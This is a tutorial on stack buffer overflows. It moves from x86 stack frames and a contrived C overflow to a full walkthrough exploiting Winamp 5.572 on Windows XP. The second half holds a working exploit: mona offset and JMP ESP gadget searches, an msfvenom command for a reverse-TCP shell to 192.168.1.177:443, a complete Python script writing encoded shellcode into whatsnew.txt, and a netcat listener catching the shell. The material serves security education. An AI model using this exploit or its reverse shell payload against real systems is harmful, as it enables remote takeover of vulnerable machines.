What’s a buffer overflow, and they can be exploited. Cover some prerequistite knowledge of (Intel x86) assembly and how a Von-Neumann machine works is needed. Attacking the stack is only one category of control flow attack, there are many others including heap allocators, race conditions, root exploits, ELF, networking, viruses, etc.

The end game is to gain control of the instruction pointer (IP), and as a result contol flow of the program. But to set the scene, need to understand how this is even possible in the first place. All general purpose binary computers are bound by the laws of the turing machine, and its implementation architecture, the Von-Neumann design.

Why a stack?

The most elegant and clearly written resource for understanding the stack and its weaknesses is the seminal paper by Aleph One called Smashing The Stack For Fun And Profit, PDF version here.

The stack exists to provide hardware (CPU) level support for procedures, one of the most pivotal concepts introduced by high-level languages such as C. A procedure call alters the control flow, like a jump instuction does, but unlike a jump, when finished, a procedure returns control to the instruction following the call.

The stack is also used to:

dynamically allocate local variables used within procedures
to pass parameters to procedures
to return values from the procedure

When a process is loaded into memory, are cut up into three regions, text, data and stack.

    0x00000000
/------------------\
|                  |
|       Text       |
|                  |
|------------------|
|   (Initialized)  |
|        Data      |
|  (Uninitialized) |
|------------------|
|                  |
|       Stack      |
|                  |
\------------------/
    0xFFFFFFFF

The text region is fixed and includes code (instructions) and read-only data. This region is normally marked as read-only by the kernel, and any attempt to modify it will result in a segmentation fault.

The data region corresponds to the data-bss section the the object file (e.g. in say an ELF or PE binary). Static variables are stored here. Dynamic variables are allocated at runtime on the stack.

How the stack works

A stack is a contiguous block of memory. A register called the stack pointer (SP) points to the top of the stack. The CPU provides instructions PUSH onto and to POP off the stack.

The stack is made up of a bunch of stack frames, which are pushed whenever a procedure is called, and popped whenever a procedure returns. A stack frame contains all state that a procedure cares about (parameters, local variables), the address of the instruction needed to recover the previous stack frame, and the instruction pointer at the time the procedure was called (so execution of the program can continue where it left off).

Depending on the CPU the stack will either grow downwards (towards lower memory addresses) or upwards. Lots of chips (e.g. Intel, Motorola, SPARC and MIPS) grow down.

In addition to the stack pointer or SP, its convenient to keep track of a frame pointer or FP which is a fixed location in each stack frame. The frame pointer is also commonly referred to as the base pointer or BP. This provides a way for local variables to be referenced by their offset from the FP (e.g. FP - 12). While the SP can indeed be used as to reference things on the stack, this is risky as its offset changes by its very nature…as words are pushed onto and popped off the stack. In other words the FP does not change with PUSHes and POPs. On Intel, the EBP register is used to store the frame pointer.

             0x00000000
        
        |       ...        |
        |------------------|
ESP ->  |       var2       | EBP - 8
        |------------------|
        |       var1       | EBP - 4
        |------------------|
EBP ->  |    saved EBP     |
        |------------------|
        |      return      | EBP + 4
        |------------------|
        |       arg1       | EBP + 8
        |------------------|
        |       arg2       | EBP + 12
        |------------------|
        |       ...        |
        
             0xFFFFFFFF

Procedure prolog and epilog

Prolog

As soon as a procedure is called, it must:

Save the previous FP (so it can be recovered at procedure exit)
Copy the SP into the FP to create a new FP
Advance the SP to reserve space needed for local variables

Epilog

When the procedure is ready to exit, it must:

Ensure the stack is cleaned up
Reinstate the instruction pointer the moment before the procedure was called, so control flow in the program continues

There are different conventions here.

In the UNIX and Linux world (cdecl) its up to the procedure (callee) to clean up the stack (e.g. ADD ESP,12) and the caller to reinstate the IP using the RET instruction.

In the Windows world (stdcall) its up to the caller of the procedure to do everything (e.g. RET 12).

The RET instruction pops the last value off the stack, which supposed to be the returning address, and assign it to the IP register. RET can also optionally be given a number of bytes such as RET 12 which would first reduce the SP by 12 bytes, followed by POPing the address to place into the IP.

Overwriting the return address (contrived example)

To help drive the buffer overrun home with a working sample. As highlighted, when procedure is called its prolog saves the return address and creates a new stack frame. The return address allows control flow to resume where it left off, once the procedure call is complete. It is this very control flow that a buffer overrun exploits.

First a piece of vulnerable code:

void overflowme(char *str) {
    char buf[4] = {0};
    strcopy(buf, str);
}

void secretfunc(void) {
    puts("1337 h4x07\n");
}

void strcopy(char* dst, char* src) {
    while ((*dst++ = *src++));
}

The main function calls overflowme, but the objective here is to make the program execute secretfunc, which it currently does not. To achieve this, the exact memory address of secretfunc as it exists in the address space of the running program is needed. To keep this first example simple, the address is output:

printf("[+] secretfunc is @ %p\n", (void*)secretfunc);

Which dumps out something like this:

[+] secretfunc is @ 0x804975a

overflowme contains a 4 byte buffer. To get the program to run secretfunc, seems like just a matter of filling the buffer up with a large number of bytes that match the address of secretfunc (0x804975a). Some Python that will interact with the vulnerable server process - to start let try and flood the 4-byte buffer with 12 bytes:

#!/usr/bin/env python

import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 8888))
#buf="A" * 8
buf = struct.pack('<I', 0x804975a) * 12
print("Sending shellcode (" + str(len(buf)) + " bytes)")
s.send(buf)

Start the vulnerable C server process:

# ./bin/server
[+] Server is starting...
[+] Server is now listening on 8888
[+] secretfunc is @ 0x804975a
[+] Awaiting clients...

And run the python exploit:

  [+] (Client 4) Connected
Printing:You are client 4
  [+] (Client 4) Sent us 48 bytes
  [+] (Client 4) Sent us ''
1337 h4x07
1337 h4x07
...
Illegal instruction

We can see the secretfunc was executed several times, before the program crashed.

Windows Example - Winamp 5.572 on XP

As documented on exploit-db this old version of winamp had a buffer overflow vulnerability in part of its help menu, which loads its release notes from a plain text file called whatsnew.txt in its install path.

Note this does not defeat DEP (data execution prevention), an OS level mitigation that was widely deployed in the early 2000’s. It disallows instructions that are placed on the stack to be executed. I walkthrough the innovative (at the time) solution to this problem first presented by Alexander Peslyak (aka Solar Designer) in 1997, in the post ROP chains.

Setup

Setup requirements for VM:

Windows XP SP3
Winamp 5.572
Immunity Debugger with mona extension
Python

Step 1: Find the overflow tipping point

The key to leveraging a buffer overflow is to locate the offset in bytes needed in order to gain control of the EIP (instruction pointer). One brute force way of doing this is to simply flood the buffer with a huge amount of the same bytes, observing the register state when the program crashes.

In the case of winamp, flood the buffer with 2,000 A (0x41) character bytes:

buf = "Winamp 5.572"
buf += "A"*3000

with open('whatsnew.txt', 'w') as file:
    file.write(buf)

Replace the original whatsnew.txt with the above, and run winamp using Immunity, go to the Help | About Winamp | Version History, triggering a segmentation fault. Examine the EIP register.

EIP 41414141

Bingo! They’re all A ascii characters. Now we need a way to determine the exact number of bytes until the EIP is controlled. A unique pattern of bytes would be perfect. Enter mona, which bolsters immunity debugger with a bunch of handy automation around exploitation related activities. In Immunity run the following:

!mona pattern_create 3000

This will create a 3000 byte long unique cyclic string in a file called pattern.txt in the immunity home directory:

Message=Creating cyclic pattern of 3000 bytes
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2...

Replace the A bytes with the pattern bytes, and segfault winamp again.

buf = "Winamp 5.572"
buf += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa..."

with open('whatsnew.txt', 'w') as file:
    file.write(buf)

Examine the EIP and find where in this pattern the offset is:

EIP 41307341

Nice, 4 unique bytes, just need to find the index within the pattern text and we get the offset.

mona again can take care of this grunt work automatically. It will cross examine the data in each register against the pattern text:

!mona suggest
      
          ---------- Mona command started on 2019-08-10 23:26:41 (v2.0, rev 596) ----------
0BADF00D  [+] Examining registers
0BADF00D      EIP contains normal pattern : 0x41307341 (offset 540)
0BADF00D      ESP (0x00b7ef60) points at offset 560 in normal pattern (length 2439)
0BADF00D      EDI (0x00b7efb0) points at offset 640 in normal pattern (length 2359)
0BADF00D      EBP (0x00b7ef74) points at offset 580 in normal pattern (length 2419)

The offset to EIP heaven is 540.

Step 2: Find a trampoline (JMP ESP gadget)

Now that the specific number of bytes needed to gain control of EIP has been identified, need to somehow get the address of our shellcode into the EIP. A clever way to accomplish this, with needing to know the specific address to the shellcode in address space (which is always on the move with ASLR), is to use a JMP ESP trampoline. The idea is, if we can point the EIP to an existing JMP ESP; RET instruction in the program, control flow will transfer back to the overflowed stack buffer, immediately after the return address value that was crafted.

!mona jmp -r esp
          
          ---------- Mona command started on 2019-08-10 23:27:42 (v2.0, rev 596) ----------
0BADF00D  [+] Processing arguments and criteria
0BADF00D      - Pointer access level : X
0BADF00D  [+] Generating module info table, hang on...
0BADF00D      - Processing modules
0BADF00D      - Done. Let's rock 'n roll.
0BADF00D  [+] Querying 137 modules
0BADF00D      - Querying module COMDLG32.dll
0BADF00D      - Querying module in_vorbis.dll
...
0BADF00D      - Querying module wdmaud.drv
0BADF00D      - Search complete, processing results
0BADF00D  [+] Preparing output file 'jmp.txt'
0BADF00D      - (Re)setting logfile jmp.txt
0BADF00D  [+] Writing results to jmp.txt
0BADF00D      - Number of pointers of type 'jmp esp' : 96 
0BADF00D      - Number of pointers of type 'call esp' : 64 
0BADF00D      - Number of pointers of type 'push esp # ret ' : 85 
0BADF00D      - Number of pointers of type 'push esp # ret 0x04' : 2 
0BADF00D  [+] Results : 
59A050A3    0x59a050a3 : jmp esp |  {PAGE_EXECUTE_READ} [wmdmlog.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v9.0.1.56 (C:\WINDOWS\system32\wmdmlog.dll)
77559BFF    0x77559bff : jmp esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
7755A930    0x7755a930 : jmp esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
775A996B    0x775a996b : jmp esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
775C068D    0x775c068d : jmp esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
7E429353    0x7e429353 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
7E4456F7    0x7e4456f7 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
7E455AF7    0x7e455af7 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
7E45B310    0x7e45b310 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0BADF00D  ... Please wait while I'm processing all remaining results and writing everything to file...
0BADF00D  [+] Done. Only the first 20 pointers are shown here. For more pointers, open jmp.txt...
0BADF00D      Found a total of 247 pointers
0BADF00D  
0BADF00D  [+] This mona.py action took 0:01:45.452000

Awesome, lots of JMP ESP gadgets were discovered, I’ll just go with the first one from wmdmlog.dll at address 0x59a050a3. All discovered JMP ESP gadgets are written out to jmp.txt.

Step 3: Shellcode

We nearly have all the ingredient for a classical executable stack based overflow attack. We just some shellcode, a reverse shell that will dial home to our remote host, giving us control over the computer. Using metasploit:

msfvenom -n 100 -p windows/shell_reverse_tcp -f python -a x86 --platform windows -b "\x00\x09\x0a\x0d\x1a" -e x86/shikata_ga_nai LHOST=192.168.1.177 LPORT=443 > shellcode.py

Step 4: Craft the payload

Python is very good for crafting payloads, especially useful is the struct package which will pack bytes according to the specified endianess.

Given all the ingredients have been obtained, simply need to pack the payload for poor old winamp according to the following layout:

[ PADDING UNTIL EIP ][ JMP ESP GADGET ][ SHELLCODE ]

A little bit of python to pack the payload, noting the shellcode was already conveniently in python that to the -f switch using msfvenon. Checkout the struct.pack call - how dope is that!?

import struct

buf = "Winamp 5.572"

buf += "A"*540

jmp_esp_addr = struct.pack('<I', 0x59a050a3)
buf += jmp_esp_addr

buf += "\x90" * 16 # small nop sled

#shell code from msfvenom
buf += "\x48\x41\x90\xf5\x27\x93\x4b\xf9\x41\xf9\xd6\x37\x9f"
buf += "\xf5\x2f\xf9\x37\x91\xf9\x3f\x3f\x9f\x43\x4a\x37\x98"
buf += "\x93\x41\x4b\x41\x41\x41\x3f\x27\x4b\x92\x2f\x98\x40"
buf += "\x41\x99\x90\xfd\xf9\x4a\x90\x98\x4b\x48\xf9\x43\xf5"
buf += "\xfc\x93\x40\x3f\xf5\x98\x9b\x42\x49\x37\x9f\x92\xf5"
buf += "\x92\x93\x90\x3f\x98\xd6\x92\x98\xfc\x92\x98\x3f\x43"
buf += "\x4a\x90\x27\x9b\x92\x42\x92\x42\x99\x92\x98\x27\xfd"
buf += "\x9b\x42\x92\x42\xfc\x98\xfc\xfc\xfc\xd9\xed\xd9\x74"
buf += "\x24\xf4\x58\xba\x5c\x49\xdd\x1b\x31\xc9\xb1\x52\x31"
buf += "\x50\x17\x03\x50\x17\x83\x9c\x4d\x3f\xee\xe0\xa6\x3d"
buf += "\x11\x18\x37\x22\x9b\xfd\x06\x62\xff\x76\x38\x52\x8b"
buf += "\xda\xb5\x19\xd9\xce\x4e\x6f\xf6\xe1\xe7\xda\x20\xcc"
buf += "\xf8\x77\x10\x4f\x7b\x8a\x45\xaf\x42\x45\x98\xae\x83"
buf += "\xb8\x51\xe2\x5c\xb6\xc4\x12\xe8\x82\xd4\x99\xa2\x03"
buf += "\x5d\x7e\x72\x25\x4c\xd1\x08\x7c\x4e\xd0\xdd\xf4\xc7"
buf += "\xca\x02\x30\x91\x61\xf0\xce\x20\xa3\xc8\x2f\x8e\x8a"
buf += "\xe4\xdd\xce\xcb\xc3\x3d\xa5\x25\x30\xc3\xbe\xf2\x4a"
buf += "\x1f\x4a\xe0\xed\xd4\xec\xcc\x0c\x38\x6a\x87\x03\xf5"
buf += "\xf8\xcf\x07\x08\x2c\x64\x33\x81\xd3\xaa\xb5\xd1\xf7"
buf += "\x6e\x9d\x82\x96\x37\x7b\x64\xa6\x27\x24\xd9\x02\x2c"
buf += "\xc9\x0e\x3f\x6f\x86\xe3\x72\x8f\x56\x6c\x04\xfc\x64"
buf += "\x33\xbe\x6a\xc5\xbc\x18\x6d\x2a\x97\xdd\xe1\xd5\x18"
buf += "\x1e\x28\x12\x4c\x4e\x42\xb3\xed\x05\x92\x3c\x38\x89"
buf += "\xc2\x92\x93\x6a\xb2\x52\x44\x03\xd8\x5c\xbb\x33\xe3"
buf += "\xb6\xd4\xde\x1e\x51\x1b\xb6\x21\x25\xf3\xc5\x21\x24"
buf += "\xbf\x43\xc7\x4c\xaf\x05\x50\xf9\x56\x0c\x2a\x98\x97"
buf += "\x9a\x57\x9a\x1c\x29\xa8\x55\xd5\x44\xba\x02\x15\x13"
buf += "\xe0\x85\x2a\x89\x8c\x4a\xb8\x56\x4c\x04\xa1\xc0\x1b"
buf += "\x41\x17\x19\xc9\x7f\x0e\xb3\xef\x7d\xd6\xfc\xab\x59"
buf += "\x2b\x02\x32\x2f\x17\x20\x24\xe9\x98\x6c\x10\xa5\xce"
buf += "\x3a\xce\x03\xb9\x8c\xb8\xdd\x16\x47\x2c\x9b\x54\x58"
buf += "\x2a\xa4\xb0\x2e\xd2\x15\x6d\x77\xed\x9a\xf9\x7f\x96"
buf += "\xc6\x99\x80\x4d\x43\xa9\xca\xcf\xe2\x22\x93\x9a\xb6"
buf += "\x2e\x24\x71\xf4\x56\xa7\x73\x85\xac\xb7\xf6\x80\xe9"
buf += "\x7f\xeb\xf8\x62\xea\x0b\xae\x83\x3f"

with open('whatsnew.txt', 'w') as file:
    file.write(buf)

Step 5: Remote listener and run exploit

To catch the TCP reverse shell triggered by the shellcode, ensure that the remote host is listening, e.g. on a remote kali box:

nc -l -p 443

Now trigger the exploit by viewing the help menu in winamp, using the payload prepared by the python script above. You will see the netcat listener now has a DOS prompt remotely running on the windows XP host.

Why a stack?#

How the stack works#

Procedure prolog and epilog#

Prolog#

Epilog#

Overwriting the return address (contrived example)#

Windows Example - Winamp 5.572 on XP#